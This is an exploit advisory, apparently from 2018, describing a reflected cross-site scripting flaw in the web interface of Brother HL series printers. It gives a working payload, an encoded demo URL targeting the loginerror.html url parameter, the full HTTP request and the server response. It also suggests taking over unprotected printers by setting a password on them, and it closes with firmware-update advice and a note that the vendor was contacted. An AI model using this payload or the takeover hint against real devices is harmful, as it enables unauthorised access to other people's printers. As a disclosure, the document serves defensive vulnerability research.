# Exploit Title: [ XSS at Brother HL series printers] # Date: [30.05.2018] # Exploit Author: [Huy Kha] # Vendor Homepage: [http://support.brother.com] # Software Link: [ Website ] # Version: Brother HL series printers. # Tested on: Mozilla FireFox # Reflected XSS Payload : "--!>" # Description : Starting searching for printers without having a password. When you see a yellow bar with ''Configure the password'' you can take over the full printer by putting a password on it. # PoC : If you want to execute the XSS you need to be loged into the web interface first. # Example : 1. Go to the following url: http://127.0.0.1/ 2. Login with ''admin'' as password 3. Intercept now the request with Burpsuite 4. The XSS exist in the loginerror.html?url= parameter 4. Demo URL: http://127.0.0.1/etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 # Request : GET /etc/loginerror.html?url=%2Fnet%2Fnet%2Fservice_detail.html%3Fservice%3D%2522--!%253E%253CSvg%2FOnLoad%3D(confirm)(1)%253E%2522%26pageid%3D241 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # Response : HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 3389 Content-Type: text/html Content-Language: nl Connection: close Server: debut/1.20 Pragma: no-cache Brother HL-L2340D series

HL-L2340D series

Log in"&pageid=241"/>

    • Algemeen

# How to fix it? : Update the printer to Firmware 1.16 and set a new password. # Screenshot : https://imgur.com/a/3OVTSZ4 # Note: The vendor has been contacted on 30-5-2018.